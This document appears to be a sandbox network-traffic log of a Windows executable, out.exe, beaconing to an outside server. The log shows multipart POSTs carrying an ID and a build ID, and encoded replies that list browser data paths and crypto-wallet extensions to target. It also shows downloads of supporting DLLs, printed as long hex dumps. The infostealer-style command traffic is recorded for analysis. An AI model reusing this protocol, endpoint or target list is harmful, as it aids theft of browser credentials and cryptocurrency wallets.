Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49763 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:22 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHI
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:22 UTC | 256 | OUT
                                                                                                                                                                                        Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="hwid"B43596E4327B1953448019-a33c7340-61ca------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------HJEHIJEBKEBFBFHIIDHI--
2024-10-07 18:35:23 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:22 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
2024-10-07 18:35:23 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 3a1|1|1|1|db3d0ad5e24bccd6d193f6b30a0a847b|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49774 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:23 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFB
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:23 UTC | 331 | OUT
                                                                                                                                                                                        Data Ascii: ------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------IJEGDBGDBFIJKECBAKFBCont
2024-10-07 18:35:24 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:24 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
2024-10-07 18:35:24 UTC | 1564 | IN
                                                                                                                                                                                        Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49782 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:25 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJE
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:25 UTC | 331 | OUT
                                                                                                                                                                                        Data Ascii: ------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------DBKEGCAEGIIJKFIEHIJECont
2024-10-07 18:35:25 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
2024-10-07 18:35:25 UTC | 5685 | IN
                                                                                                                                                                                        Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49791 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:26 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAK
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 332
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:26 UTC | 332 | OUT
                                                                                                                                                                                        Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------HCFIIIJJKJKFHIDGDBAKCont
2024-10-07 18:35:27 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:26 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
2024-10-07 18:35:27 UTC | 119 | IN
                                                                                                                                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49802 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:27 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 5801
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:27 UTC | 5801 | OUT
                                                                                                                                                                                        Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------KEHJKJDGCGDAKFHIDBGCCont
2024-10-07 18:35:28 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:28 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
2024-10-07 18:35:28 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49810 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:28 UTC | 194 | OUT | GET /sqlp.dll HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:29 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:29 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 2459136
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Last-Modified: Monday, 07-Oct-2024 18:35:29 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                        Accept-Ranges: bytes
2024-10-07 18:35:29 UTC | 16123 | IN
                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                        Data Ascii: D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                        Data Ascii: 2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                        Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc
                                                                                                                                                                                        Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b
                                                                                                                                                                                        Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10
                                                                                                                                                                                        Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49831 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:31 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:31 UTC | 829 | OUT | Data Ascii:
------CGHDAKKJJJKJKECBGCGD
Content-Disposition: form-data; name="token"

db3d0ad5e24bccd6d193f6b30a0a847b
------CGHDAKKJJJKJKECBGCGD
Content-Disposition: form-data; name="build_id"

744fd163d6d4e0ac37e4032bcbfbb6af
------CGHDAKKJJJKJKECBGCGD
Cont
2024-10-07 18:35:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-07 18:35:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49839 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:32 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:32 UTC | 437 | OUT | Data Ascii:
------BKJEGDGIJECGCBGCGHDG
Content-Disposition: form-data; name="token"

db3d0ad5e24bccd6d193f6b30a0a847b
------BKJEGDGIJECGCBGCGHDG
Content-Disposition: form-data; name="build_id"

744fd163d6d4e0ac37e4032bcbfbb6af
------BKJEGDGIJECGCBGCGHDG
Cont
2024-10-07 18:35:33 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-07 18:35:33 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49851 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:34 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:34 UTC | 437 | OUT | Data Ascii:
------HCFIIIJJKJKFHIDGDBAK
Content-Disposition: form-data; name="token"

db3d0ad5e24bccd6d193f6b30a0a847b
------HCFIIIJJKJKFHIDGDBAK
Content-Disposition: form-data; name="build_id"

744fd163d6d4e0ac37e4032bcbfbb6af
------HCFIIIJJKJKFHIDGDBAK
Cont
2024-10-07 18:35:35 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-07 18:35:35 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49860 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:35 UTC | 197 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:36 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:36 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Monday, 07-Oct-2024 18:35:36 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                        Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00
                                                                                                                                                                                        Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7
                                                                                                                                                                                        Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0
                                                                                                                                                                                        Data Ascii: eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8
                                                                                                                                                                                        Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5
                                                                                                                                                                                        Data Ascii: ,0<48%8A)$


Session ID: 12
Source IP: 192.168.2.5
Source Port: 49875
